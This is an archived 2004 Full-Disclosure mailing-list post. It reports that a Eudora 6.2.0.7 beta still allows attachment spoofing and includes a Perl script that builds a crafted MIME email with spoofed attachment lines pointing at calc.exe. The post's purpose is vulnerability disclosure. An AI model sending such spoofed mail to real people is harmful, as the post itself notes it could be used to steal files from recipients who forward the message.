Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security NTBugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Eudora 6.2.0.7 attachment spoof

from [Paul Szabo] Network Security [Permanent Link]
Subject: [Full-Disclosure] Eudora 6.2.0.7 attachment spoof
Date: Mon, 11 Oct 2004 08:23:53 +1000 (EST) 
Eudora 6.2.0.7 for Windows is in beta testing since 8 Oct 2004. The release
notes
http://www.eudora.com/download/eudora/windows/6.2/Betas/RelNotes.txt
say:


SECURITY
--------
Fixed cases where attachments could be spoofed via base64 or quoted-printable
encoded (plain-text, inline) MIME parts.


Not so. Harmless demo below.

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia


#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.2.0.7 on Windows spoof\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";

print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n\n";
print "With spoofed attachments, we could 'steal' files (after a warning?)
if the message was forwarded (not replied to).\n";

print "\n--zzz\n";
print "Content-Type: text/html; name=\"qp.txt\"\n";
print "Content-Transfer-Encoding: quoted-printable \n";
print "Content-Disposition: inline; filename=\"qp.txt\"\n\n";
print "Within text/html part, use &lt;/x-html&gt; to get back to plaintext,
no need for NUL or linebreak or nothing:
</x-html>\n";
print "Attachment Converted=00: \"c:\\winnt\\system32\\calc.exe\"\n";
print "Attachment Converted=
: \"c:\\winnt\\system32\\calc.exe\"\n";
print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz--\n";

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] Eudora 6.2.0.7 attachment spoof, Paul Szabo <=
Previous by Date:  Re: Disclosure Debate - yet again, Michael Watterson
Next by Date:  MonkeyShell: using XML-RPC for access to a remote shell, Abe Usher
Previous by Thread:  Win XP SP 2 update operations update, Rob, grandpa of Ryan, Trevor, Devon & Hannah
Next by Thread:  MonkeyShell: using XML-RPC for access to a remote shell, Abe Usher
Indexes:  [Date] [Thread] [Top] [All Lists]